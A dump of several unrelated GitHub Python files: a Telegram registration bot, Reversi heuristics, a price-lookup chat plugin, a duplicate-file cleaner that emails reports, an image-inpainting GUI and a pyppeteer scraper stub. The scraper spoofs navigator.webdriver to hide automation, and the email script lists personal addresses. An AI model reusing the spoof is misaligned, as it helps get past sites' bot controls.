от 18 лет'),\n reply_markup=types.InlineKeyboardMarkup(\n row_width=1,\n inline_keyboard=[\n [types.InlineKeyboardButton(text=_('❌ Отмена'), callback_data='cancel')]\n ]\n )\n )\n await RegisterForm.age.set()\n else:\n await message.answer(\n text=_('⚠️ Вводите данные в правильном формате')\n )\n\n\nasync def get_age(message: types.Message, state: FSMContext, repo: SQLAlchemyRepos):\n age = message.text\n if age.isdigit():\n if int(age) < 18:\n await message.answer(\n text=_('⚠️ Мы принимаем заявки только от 18 лет')\n )\n else:\n await state.update_data(age=age)\n region = repo.get_repo(RegionRepo)\n regions = await region.get_regions()\n keyboard = types.ReplyKeyboardMarkup(row_width=3, resize_keyboard=True, one_time_keyboard=True)\n for r in regions:\n keyboard.insert(types.KeyboardButton(text=r.region_name))\n await message.answer(\n text=_('Выберите ваш регион с помощью кнопок ниже'),\n reply_markup=keyboard,\n )\n await RegisterForm.region.set()\n else:\n await message.answer(\n text=_('⚠️ Вводите данные в правильном формате')\n )\n\n\nasync def get_region(message: types.Message, repo: SQLAlchemyRepos, state: FSMContext):\n region = message.text\n regions = await repo.get_repo(RegionRepo).get_regions()\n regions = [x.region_name for x in regions]\n if region not in regions:\n await message.answer(\n text=_('⚠️ Выбирайте только с помощью кнопок')\n )\n else:\n await state.update_data(region=region)\n await message.answer(\n text=_('Отправьте номер телефона с помощью кнопок ниже'),\n reply_markup=types.ReplyKeyboardMarkup(\n row_width=1,\n keyboard=[[types.KeyboardButton(text=_('📞 Отправить номер телефона'), request_contact=True)]],\n resize_keyboard=True,\n one_time_keyboard=True\n )\n )\n await RegisterForm.phone_number.set()\n\n\nasync def get_phone(message: types.Message, repo: SQLAlchemyRepos, state: FSMContext):\n phone_number = message.contact.phone_number\n await state.update_data(phone_number=phone_number)\n data = await state.get_data()\n await message.answer(\n text=_('❗️ Еще раз перепроверьте свои данные затем потдвердите ваше действие\\n\\n'\n '<b>Имя:</b> {name}\\n'\n '<b>Фамилия:</b> {surname}\\n'\n '<b>Возраст:</b> {age}\\n'\n '<b>Регион:</b> {region}\\n'\n '<b>Номер телефона:</b> {phone_number}').format(\n name=data.get('name'),\n surname=data.get('surname'),\n age=data.get('age'),\n email=data.get('email'),\n region=data.get('region'),\n phone_number=phone_number\n ),\n reply_markup=types.InlineKeyboardMarkup(\n row_width=1,\n inline_keyboard=[\n [types.InlineKeyboardButton(text=_('✅ Подтвердить'), callback_data='confirm')],\n [types.InlineKeyboardButton(text=_('❌ Отмена'), callback_data='cancel')],\n ]\n )\n )\n","repo_name":"uicodee/leoconsultingbot","sub_path":"tgbot/handlers/content/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18542337634","text":"import numpy as np\r\n\r\nclass StatisticData:\r\n\t\"\"\"\r\n\tSimple structure that holds data that are interesting for heuristic functions.\r\n\t\"\"\"\r\n\tdef __init__(self,\r\n\t\tmy_move_count,\r\n\t\topponent_move_count,\r\n\r\n\t\tshallow_board,\r\n\r\n\t\tscore,\r\n\r\n\t\tscale = 100.0\r\n\t\t):\r\n\r\n\t\tself.scale = scale\r\n\t\tself.my_move_count = my_move_count\r\n\t\tself.opponent_move_count = opponent_move_count\r\n\t\tself.mat = shallow_board\r\n\r\n\t\tself.score = score\r\n\r\n\tdef simple_from_board(board):\r\n\t\tmy_move_count = len(board.get_all_valid_moves(1) or [])\r\n\t\topponent_move_count = len(board.get_all_valid_moves(-1) or [])\r\n\t\tshallow_board = np.array(board.board)\r\n\t\tscore = np.sum(shallow_board)\r\n\t\treturn StatisticData(my_move_count, opponent_move_count, shallow_board, score)\r\n\r\n\tdef from_board_and_colors(raw_board, shallow_board, my_color, opponent_color):\r\n\t\tmy_move_count = len(raw_board.get_all_valid_moves(my_color) or [])\r\n\t\topponent_move_count = len(raw_board.get_all_valid_moves(opponent_color) or [])\r\n\t\tscore = np.sum(shallow_board)\r\n\t\treturn StatisticData(my_move_count, opponent_move_count, shallow_board, score)\r\n\r\n# The following are implemented heuristic functions:\r\n# Some were inspired by https://barberalec.github.io/pdf/An_Analysis_of_Othello_AI_Strategies.pdf\r\n\r\ndef HEUR_parity(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of fields\r\n\tcaptured by max - min player.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tscale = 100 / (data.mat.shape[0] * data.mat.shape[1])\r\n\r\n\tmoves = np.sum(np.abs(data.mat))\r\n\r\n\tif moves <= data.mat.shape[0]:\r\n\t\t# it is better to give away stones early\r\n\t\treturn -scale * data.score\r\n\t#else\r\n\treturn scale * data.score\r\n\r\nSTABILITY_MATRIX = None\r\n\r\nSTABILITY_MATRICES = {\r\n\t8:\r\n\r\n# inspired by https://courses.cs.washington.edu/courses/cse573/04au/Project/mini1/RUSSIA/Final_Paper.pdf\r\nnp.array(\r\n\t[\r\n\t\t[4,-3,2,2,2,2,-3,4],\r\n\t\t[-3,-4,-1,-1,-1,-1,-4,-3],\r\n\t\t[2,-1,1,0,0,1,-1,2],\r\n\t\t[2,-1,0,1,1,0,-1,2],\r\n\t\t[2,-1,0,1,1,0,-1,2],\r\n\t\t[2,-1,1,0,0,1,-1,2],\r\n\t\t[-3,-4,-1,-1,-1,-1,-4,-3],\r\n\t\t[4,-3,2,2,2,2,-3,4],\r\n\t]\r\n),\r\n\r\n10: np.array(\r\n\t[\r\n\t\t[4,-3,2,2,2,2,2,2,-3,4],\r\n\t\t[-3,-4,-1,-1,-1,-1,-1,-1,-4,-3],\r\n\t\t[2,-1,1,0,0,0,0,1,-1,2],\r\n\t\t[2,-1,0,0,0,0,0,0,-1,2],\r\n\t\t[2,-1,0,0,1,1,0,0,-1,2],\r\n\t\t[2,-1,0,0,1,1,0,0,-1,2],\r\n\t\t[2,-1,0,0,0,0,0,0,-1,2],\r\n\t\t[2,-1,1,0,0,0,0,1,-1,2],\r\n\t\t[-3,-4,-1,-1,-1,-1,-1,-1,-4,-3],\r\n\t\t[4,-3,2,2,2,2,2,2,-3,4],\r\n\t]\r\n),\r\n\r\n6: np.array(\r\n\t[\r\n\t\t[4,-3,2,2,-3,4],\r\n\t\t[-3,-4,-1,-1,-4,-3],\r\n\t\t[2,-1,1,1,-1,2],\r\n\t\t[2,-1,1,1,-1,2],\r\n\t\t[-3,-4,-1,-1,-4,-3],\r\n\t\t[4,-3,2,2,-3,4],\r\n\t]\r\n)\r\n}\r\n\r\ndef HEUR_stability(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of stability\r\n\tof fields.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tstability = np.sum(data.mat * STABILITY_MATRIX)\r\n\r\n\treturn stability\r\n\r\ndef HEUR_corners(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference in\r\n\tcounts of corners captured.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\treturn 25 * (data.mat[0,0] + data.mat[0, -1] + data.mat[-1, 0] + data.mat[-1, -1])\r\n\r\nEDGE_MATRIX = None\r\n#np.array(\r\n#\t[\r\n#\t\t[4, 4, 4, 4, 4, 4, 4, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 4, 4, 4, 4, 4, 4, 4],\r\n#\t]\r\n#)\r\n\r\ndef HEUR_edges(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of captures\r\n\ton edges.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tedges = np.sum(data.mat * EDGE_MATRIX)\r\n\r\n\treturn edges\r\n\r\ndef HEUR_mobility(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of mobility\r\n\tof players.\r\n\t\r\n\tReturns evaluation range -scale - scale.\r\n\t\"\"\"\r\n\r\n\ttotal = data.my_move_count + data.opponent_move_count\r\n\tdiff = data.my_move_count - data.opponent_move_count\r\n\r\n\tif total == 0:\r\n\t\treturn 0\r\n\r\n\treturn data.scale * diff / total\r\n\r\nCORNER_CLOSENESS_MATRIX = None\r\n\r\nCORNER_CLOSENESS_MATRICES = {\r\n\t8:\r\n\tnp.array([\r\n\t\t[27, -9, 0, 0, 0, 0, -9, 27],\r\n\t\t[-9, -9, 0, 0, 0, 0, -9, -9],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[-9, -9, 0, 0, 0, 0, -9, -9],\r\n\t\t[27, -9, 0, 0, 0, 0, -9, 27],\r\n\t]),\r\n\r\n\t10:\r\n\tnp.array([\r\n\t\t[27, -9, 0, 0, 0, 0, 0, 0, -9, 27],\r\n\t\t[-9, -9, 0, 0, 0, 0, 0, 0, -9, -9],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[-9, -9, 0, 0, 0, 0, 0, 0, -9, -9],\r\n\t\t[27, -9, 0, 0, 0, 0, 0, 0, -9, 27],\r\n\t]),\r\n\r\n\t6:\r\n\tnp.array([\r\n\t\t[27, -9, 0, 0, -9, 27],\r\n\t\t[-9, -9, 0, 0, -9, -9],\r\n\t\t[0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0],\r\n\t\t[-9, -9, 0, 0, -9, -9],\r\n\t\t[27, -9, 0, 0, -9, 27],\r\n\t]),\r\n}\r\n\r\ndef HEUR_corner_closeness(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of captured\r\n\tfields adjacent to corners.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tcorner_closeness = np.sum(data.mat * CORNER_CLOSENESS_MATRIX)\r\n\r\n\treturn corner_closeness\r\n\r\ndef HEUR_frontier(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of disks\r\n\tadjacent to empty space(s).\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tmask = np.zeros(data.mat.shape)\r\n\r\n\tvalue = 100 / ((data.mat.shape[0] - 1) * (data.mat.shape[1] - 1))\r\n\thalf_value = value / 2\r\n\r\n\t# handle inner cells\r\n\tfor y in range(1, data.mat.shape[1]):\r\n\t\tfor x in range(1, data.mat.shape[0]):\r\n\t\t\tif data.mat[y,x] != 0:\r\n\t\t\t\t# if there are no empty squares, product is non-zero, 0 is written\r\n\t\t\t\t# if there are empty squares, product is zero, -x is written\r\n\t\t\t\tmask[y,x] = -value * int(not np.prod(data.mat[y-1:y+2, x-1:x+2]))\r\n\r\n\t# handle y edges\r\n\tfor y in range(1, data.mat.shape[1]):\r\n\t\tif data.mat[y,0] != 0:\r\n\t\t\tmask[y,0] = -half_value * int(not np.prod(data.mat[y-1:y+2, 0:2]))\r\n\r\n\t\tif data.mat[y,-1] != 0:\r\n\t\t\tmask[y,-1] = -half_value * int(not np.prod(data.mat[y-1:y+2, -2:]))\r\n\r\n\t# handle x edges\r\n\tfor x in range(1, data.mat.shape[1]):\r\n\t\tif data.mat[0,x] != 0:\r\n\t\t\tmask[0,x] = -half_value * int(not np.prod(data.mat[0:2, x-1:x+2]))\r\n\r\n\t\tif data.mat[-1,x] != 0:\r\n\t\t\tmask[-1,x] = -half_value * int(not np.prod(data.mat[-2:, x-1:x+2]))\r\n\r\n\t# ignore corners\r\n\r\n\tfrontier = np.sum(data.mat * mask)\r\n\r\n\treturn frontier\r\n\r\nPOSITIONAL_MATRIX = None\r\n\r\nPOSITIONAL_MATRICES = {\r\n\t8:\r\n\r\n# inspired by https://www.samsoft.org.uk/reversi/strategy.htm#stable\r\nnp.array(\r\n\t[\r\n\t\t[99,-8,8,6,6,8,-8,99],\r\n\t\t[-8,-24,-4,-3,-3,-4,-24,-8],\r\n\t\t[8,-4,7,4,4,7,-4,8],\r\n\t\t[6,-3,4,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,4,-3,6],\r\n\t\t[8,-4,7,4,4,7,-4,8],\r\n\t\t[-8,-24,-4,-3,-3,-4,-24,-8],\r\n\t\t[99,-8,8,6,6,8,-8,99],\r\n\t]\r\n),\r\n\r\n10:\r\nnp.array(\r\n\t[\r\n\t\t[99,-8,8,6,6,6,6,8,-8,99],\r\n\t\t[-8,-24,-4,-3,-3,-3,-3,-4,-24,-8],\r\n\t\t[8,-4,7,4,4,4,4,7,-4,8],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[8,-4,7,4,4,4,4,7,-4,8],\r\n\t\t[-8,-24,-4,-3,-3,-3,-3,-4,-24,-8],\r\n\t\t[99,-8,8,6,6,6,6,8,-8,99],\r\n\t]\r\n),\r\n\r\n6:\r\nnp.array(\r\n\t[\r\n\t\t[99,-8,8,8,-8,99],\r\n\t\t[-8,-24,-4,-4,-24,-8],\r\n\t\t[8,-4,0,0,-4,8],\r\n\t\t[8,-4,0,0,-4,8],\r\n\t\t[-8,-24,-4,-4,-24,-8],\r\n\t\t[99,-8,8,8,-8,99],\r\n\t]\r\n),\r\n}\r\n\r\ndef HEUR_positional(data: StatisticData) -> float:\r\n\tpositional_score = np.sum(data.mat * POSITIONAL_MATRIX)\r\n\r\n\treturn positional_score\t\r\n","repo_name":"ForgotMyCode/ReversiBot","sub_path":"heuristic.py","file_name":"heuristic.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7539484589","text":"import requests\nfrom googlefinance import getQuotes\nfrom helga import settings\nfrom helga.plugins import command, random_ack\n\n\nCRYPTO_URL = 'https://min-api.cryptocompare.com/data/price?fsym={from_symbol}&tsyms={to_symbol}'\nCRYPTO_LIST = 'https://www.cryptocompare.com/api/data/coinlist/'\nTARGET_CURRENCY = getattr(settings, 'TRADE_TARGET_CURRENCY', 'USD')\nRESPONSE_TEMPLATE = '{currency_type} {symbol} is currently trading at {price} {target_currency}'\ncrypto_data = None\n\n\ndef logic(args):\n crypto_data = fetch_crypto_data()\n if len(args) == 1:\n symbol = args[0].lower()\n try:\n price = try_crypto(symbol)\n return RESPONSE_TEMPLATE.format(currency_type='Crypto', symbol=symbol, price=price, target_currency=TARGET_CURRENCY)\n except ValueError:\n try:\n price = float(getQuotes(symbol)[0]['LastTradePrice'])\n return RESPONSE_TEMPLATE.format(currency_type='Stock', symbol=symbol, price=price, target_currency=TARGET_CURRENCY)\n except:\n return 'Symbol ' + symbol + ' not supported!'\n return 'Try asking for help? Unknown command: ' + ', '.join(args)\n\n\ndef try_crypto(symbol='btc'):\n \"\"\" Test out of symbol is crypto, and if so return price. Throw ValueError otherwise. \"\"\"\n if symbol not in crypto_data:\n for crypto_symbol, data in crypto_data.items():\n if data['CoinName'] == symbol:\n symbol = crypto_symbol\n if symbol in crypto_data:\n response = requests.get(CRYPTO_URL.format(from_symbol=symbol.upper(), to_symbol=TARGET_CURRENCY)).json()\n price = response[TARGET_CURRENCY]\n return float(price)\n raise ValueError(symbol + ' not available as crypto')\n\n\ndef fetch_crypto_data():\n \"\"\" Fetch and parse crypto data \"\"\"\n global crypto_data\n if not crypto_data:\n response = requests.get(CRYPTO_LIST).json()\n crypto_data = {symbol.lower(): data for symbol, data in response['Data'].items()}\n return crypto_data\n\n\n@command('trade', help='Stock, crypto, forex trade information plugin for helga\\n!trade btc')\ndef trade(client, channel, nick, message, cmd, args):\n return logic(args)\n","repo_name":"narfman0/helga-trade","sub_path":"helga_trade/helga_trade.py","file_name":"helga_trade.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72060606201","text":"import os\nimport time\nimport schedule\nimport EmailModule\nfrom sys import *\nfrom datetime import datetime\nimport Checksum as module\n\nFilesScanCount = 0\nFilesDeleteCount = 0\nOutput = \"\"\nScan_Time = \"\"\nLog_Time = \"\"\n\n\ndef CreateOutput(Dir_Name, Log_Dir=\"Marvellous\"):\n Log_Dir = os.path.join(Dir_Name, Log_Dir)\n if not os.path.exists(Log_Dir):\n os.mkdir(Log_Dir)\n\n global FilesScanCount, FilesDeleteCount, Output, Scan_Time, Log_Time\n Scan_Time = datetime.now().strftime(\"%I:%M:%S %p\")\n\n lst, FileScanCnt, FileDeletedCnt = module.DeleteDuplicateFiles(Dir_Name)\n\n FilesScanCount = FileScanCnt\n FilesDeleteCount = FileDeletedCnt\n\n Log_Time = time.ctime()\n FileName = Log_Dir + \"\\Yogesh_log.txt\"\n\n Output = FileName\n data = \"\"\n fd = open(FileName, \"w\")\n fd.write(\"Log of deleted duplicate files, from directory: \" + Log_Time + \"\\n\")\n fd.write(data)\n for i in lst:\n fd.write(\"\\n\" + \"-\" * 80)\n fd.write(\"\\n\" + str(i))\n fd.close()\n\n\ndef CreateMail(To, FileName, Scan_Time, Log_Time, FileScanCnt, FileDeletedCnt):\n username = \"yogeshnichal@gmail.com\"\n password = \"**** **** **** ****\" # Google, App Passwords for SMTP\n to = To\n\n name = To[0:To.rfind('@')]\n name = ''.join(i for i in name if not i.isdigit())\n\n subject = \"This email sent by program about process log report: %s\" % Log_Time\n\n body = (\"\"\"\\\n <html>\n <body>\n <p>Hello, %s<p>\n <b style=\"font-size: 1rem; color: #483D8B;\"> Python Automation Mail Schedule with Attachment Script.</b>\n <p>Please find attached log file which contains<p>\n <p>Log of deleted duplicate files, from directory.<p>\n <p>Scanning process started at: %s<p>\n <p>Total files scanned: %s<p> \n <p>Total duplicate files found: %s<p>\n\n <p>This is autogenerated mail.<p>\n\n <p>Thanks & Regards,<p>\n <p>Yogesh Prabhu Nichal<p>\n </body>\n </html>\n \"\"\"\n ) % (name, Scan_Time, FileScanCnt, FileDeletedCnt)\n\n if EmailModule.is_connected():\n EmailModule.sendmail(username, password, To, FileName, subject, body)\n\n\ndef main():\n print(\"-------------------------------------Yogesh Prabhu Nichal------------------------------------------\")\n print(\"\\nApplication name:\", argv[0])\n\n if len(argv) != 4:\n print(\"Insufficient number of arguments. Use -h or -u for help.\")\n exit()\n\n if argv[1].lower() == \"-h\":\n print(\"This script will traverse the directory and delete all duplicate files from that directory.\\n\"\n \"Script will write name of deleted files into a 'log' file & Log.txt will create into Directory_Name\\n\"\n \"and Mail will send with log file attachment Receiver_Email_id\")\n exit()\n\n if argv[1].lower() == \"-u\":\n print(\"Use: Application_Name Directory_Name Interval_Time Receiver_Email_id\")\n exit()\n\n try:\n Dir_Name = argv[1]\n Time_Interval = int(argv[2])\n To_Email = argv[3]\n\n schedule.every(Time_Interval).minutes.do(lambda: CreateOutput(Dir_Name))\n schedule.every(int(1)).minutes.do(lambda: CreateMail(To_Email, Output, Scan_Time, Log_Time, FilesScanCount, FilesDeleteCount))\n\n while True:\n schedule.run_pending()\n time.sleep(2)\n\n except Exception as E:\n print(E)\n finally:\n print(\"\\n--------------------------------------Thank You--------------------------------------\")\n\n\nif __name__ == \"__main__\":\n main()\n\n # py Assignment13.py D:\\Demo 01 myfriend.nichal@gmail.com","repo_name":"yogeshnichal/Python_Automation_-_Machine_Learning","sub_path":"Assignment13/Assignment13.py","file_name":"Assignment13.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"41858074038","text":"import math\ndef sotien(n):\n a = [10,3,3,1]\n for i in a[:]:\n so_to = n/i\n print(\"Tien\",i,\"d co\" , so_to, \"to\")\n n=n%i \nN = int(input(\"nhap vao so tien: \"))\nsotien(N)\n ","repo_name":"DongPhung1996/Python_01","sub_path":"sotien.py","file_name":"sotien.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20746811623","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 28 09:43:24 2020\n\n@author: user\n\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nimport tkinter.font as tkFont\nfrom PIL import ImageTk, Image\nfrom tkinter import filedialog\nfrom test_model import Output\nimport numpy as np\nimport cv2\nimport re\n\nclass Mouse:\n def __init__(self,canvas):\n \n self.x = self.y = 0\n self.canvas = canvas\n\n self.canvas.bind(\"<ButtonPress-1>\", self.on_button_press)\n self.canvas.bind(\"<B1-Motion>\", self.on_move_press)\n self.canvas.bind(\"<ButtonRelease-1>\", self.on_button_release)\n\n self.rect = None\n\n self.start_x = None\n self.start_y = None\n \n self.mask_img = np.zeros((256,256), dtype=\"uint8\")\n\n def on_button_press(self, event):\n # save mouse drag start position\n self.start_x = self.canvas.canvasx(event.x)\n self.start_y = self.canvas.canvasy(event.y)\n\n # create rectangle if not yet exist\n #if not self.rect:\n self.rect = self.canvas.create_rectangle(self.x, self.y, 1, 1, fill='white', outline=\"\")\n\n def on_move_press(self, event):\n curX = self.canvas.canvasx(event.x)\n curY = self.canvas.canvasy(event.y)\n \n # expand rectangle as you drag the mouse\n self.canvas.coords(self.rect, self.start_x, self.start_y, curX, curY) \n\n def on_button_release(self, event):\n self.rectRecord(self.start_x,self.start_y,self.canvas.canvasx(event.x),self.canvas.canvasy(event.y))\n pass\n \n def rectRecord(self,x1,y1,x2,y2):\n print(x1,y1,x2,y2)\n x1,y1,x2,y2 = int(x1),int(y1),int(x2),int(y2)\n for i in range(y1,y2+1):\n for j in range(x1,x2+1):\n self.mask_img[i,j] = 255\n\ndef readFile():\n #print(\"readFile\")\n global img\n global mouse\n global pic\n mouse = Mouse(canvas)\n basewidth = 700\n baseheight = 500\n imgsize = 0,0\n try:\n filename = filedialog.askopenfilename(title='open')\n img = Image.open(filename)\n '''\n if img.size[0]>img.size[1]:\n wpercent = (basewidth/float(img.size[0]))\n hsize = int((float(img.size[1])*float(wpercent)))\n imgsize = basewidth, hsize\n img = img.resize((basewidth, hsize), Image.ANTIALIAS)\n\n else:\n wpercent = (baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(wpercent)))\n imgsize = wsize,baseheight\n img = img.resize((wsize, baseheight), Image.ANTIALIAS)\n '''\n print(img.size)\n canvas.config(width=img.size[0],height=img.size[1])\n img = ImageTk.PhotoImage(img)\n canvas.create_image(130,130,anchor='center',image=img)\n #panel.configure(image=img)\n #panel.image = img\n tmp = filename.split(\"/\")\n filename = tmp[len(tmp)-1]\n print(filename)\n tmp = filename.split(\"_\")\n pic = tmp[len(tmp)-1].split(\".\")[0]\n print(pic)\n \n except:\n print('no file is loaded')\n\ndef maskDone():\n print(\"maskDone\")\n cv2.imshow(\"mask_\"+pic+\".png\", mouse.mask_img)\n cv2.imwrite(\"places356_mask/mask_\"+pic+\".png\", mouse.mask_img)\n cv2.waitKey(0)\n\n \ndef saveFile():\n print(\"saveFile\")\n image = \"Places365_test_\" + pic + \".jpg\"\n mask = \"mask_\" + pic + \".png\"\n output = \"output_\" + pic + \".png\"\n Output(image,mask,output)\n #print(\"!python test.py --image \\\"drive/My Drive/generative_inpainting-master/examples/places356/Places365_test_\" + pic + \".jpg\\\" --mask \\\"drive/My Drive/generative_inpainting-master/examples/places356/mask_\" + pic + \".png\\\" --output \\\"drive/My Drive/generative_inpainting-master/examples/places356/output_\" + pic + \".png\\\" --checkpoint \\\"drive/My Drive/generative_inpainting-master/model_logs/release_places2_256\\\"\")\n \n\ndef callback(event):\n print(\"clicked at\", event.x, event.y)\n\nif __name__ == \"__main__\":\n window = tk.Tk()\n # 設定視窗標題、大小和背景顏色\n window.title('Image Inpainting')\n window.geometry('600x400')\n window.configure(background='white')\n \n titleFont = tkFont.Font(family=\"Microsoft JhengHei\", size=20)\n buttonFont = tkFont.Font(family=\"Microsoft JhengHei\", size=15)\n style = ttk.Style() \n style.configure('TButton', font = ('calibri', 20, 'bold'), borderwidth = '4') \n \n \n header_label = tk.Label(window, text='Image Inpainting',background='white',font=titleFont)\n header_label.pack()\n \n # 以下為 button_frame 群組\n button_frame = tk.Frame(window,background='white')\n button_frame.pack(side=tk.TOP)\n \n # 讀取新圖片\n read_file = tk.Button(button_frame, text =\"讀檔\", command = readFile,font=buttonFont,width=10)\n read_file.pack(side=tk.LEFT,padx=30,pady=20)\n \n # 畫框框\n mask_done = tk.Button(button_frame, text =\"完成\", command = maskDone,font=buttonFont,width=10)\n mask_done.pack(side=tk.LEFT,padx=30,pady=20)\n \n # 輸出結果\n save_file = tk.Button(button_frame, text =\"儲存\", command = saveFile,font=buttonFont,width=10)\n save_file.pack(side=tk.LEFT,padx=30,pady=20)\n \n # image視窗\n canvas = tk.Canvas(window, width=256, height=256,bg='black', cursor=\"cross\")\n #canvas.bind(\"<Button-1>\", callback)\n canvas.pack(side = \"bottom\",padx=30,pady=20)\n #panel = tk.Label(window,bg='gray')\n #panel.pack(side = \"bottom\", fill = \"both\", expand = \"yes\",padx=30,pady=30)\n \n # 運行主程式\n window.mainloop()","repo_name":"littlehanli/2020CV_Image-Inpainting","sub_path":"Tkinter.py","file_name":"Tkinter.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19929487309","text":"# -*- coding:utf-8 -*-\n# author:LeiLei\n\n# -*- coding:utf-8 -*-\n# author:LeiLei\nimport asyncio\nimport datetime\nimport json\nimport logging\nimport random\nimport time\nimport pyppeteer\nimport requests\nfrom pyppeteer import launch\n\nheaders = {\n 'User-Agent' : 'Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/93.0.4573.0 Safari/537.36'\n }\n\n\nclass One(object) :\n\n def __init__(self):\n # 日志的基本配置\n logging.basicConfig(level = logging.INFO, format = '%(asctime)s - %(levelname)s: %(message)s')\n self.all_id = set()\n self.all_page = set()\n self.done_page = set()\n self.not_done_page = set()\n self.limit = 20\n self.conunt = []\n self.proxys = set()\n\n\n async def scrap_id_all(self):\n browser = await launch(\n headless = False, dumpio = True, autoClose = False,\n args = ['--no-sandbox', '--disable-infobars',f'--proxy-server=89.218.11.2:8080']\n ) # 进入有头模式\n page = await browser.newPage() # 打开新的标签页\n # await page.setViewport({'width' : 1920, 'height' : 1080}) # 页面大小一致 js为设置webdriver的值,防止网站检测 在 pyppeteer\n # 中提供了一个方法:evaluateOnNewDocument(),该方法是将一段 js 代码加载到页面文档中,当发生页面导航、页面内嵌框架导航的时候加载的 js 代码会自动执行,那么当页面刷新的时候该 js\n # 也会执行,这样就保证了修改网站的属性持久化的目的。\n\n await page.evaluateOnNewDocument(\n '() =>{ Object.defineProperties(navigator,'\n '{ webdriver:{ get: () => false } }) }'\n )\n\n\n\nif __name__ == '__main__' :\n print(requests.get('https://www.qiushibaike.com/').text)","repo_name":"124847/python_Project","sub_path":"Spark_Do/last/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12533913283","text":"import numpy as np \r\nimport matplotlib.pyplot as plt \r\nimport os\r\nimport handfulFunctions as hf\r\n\r\nclass mdrOutput:\r\n\r\n def __init__(self, nof=''):\r\n\r\n self.nameOfFile = nof\r\n\r\n fileLen = int(hf.fileLength(self.nameOfFile))\r\n self.arrayDischNum = np.zeros(fileLen, dtype=int)\r\n self.arrayDiagFreq = np.zeros(fileLen)\r\n self.arrayFreqShift = np.zeros(fileLen)\r\n self.arrayKapaSpec = np.zeros(fileLen)\r\n self.arrayRho = np.zeros(fileLen)\r\n self.arrayUncerRho = np.zeros(fileLen)\r\n self.arrayKapaPerp = np.zeros(fileLen)\r\n self.arrayUnKapaPe = np.zeros(fileLen)\r\n self.arrayMagField = np.zeros(fileLen)\r\n\r\n idx = 0\r\n\r\n with open(nof, 'r') as myFile:\r\n for line in myFile:\r\n fields = line.split()\r\n correctFields = [i for i in fields]\r\n self.arrayDischNum[idx] = int(correctFields[0])\r\n self.arrayDiagFreq[idx] = float(correctFields[1])\r\n self.arrayFreqShift[idx] = float(correctFields[4]) \r\n self.arrayKapaSpec[idx] = float(correctFields[5])\r\n self.arrayRho[idx] = float(correctFields[10])\r\n self.arrayUncerRho[idx] = float(correctFields[11])\r\n self.arrayKapaPerp[idx] = float(correctFields[12])\r\n self.arrayUnKapaPe[idx] = float(correctFields[13])\r\n self.arrayMagField[idx] = float(correctFields[14])\r\n 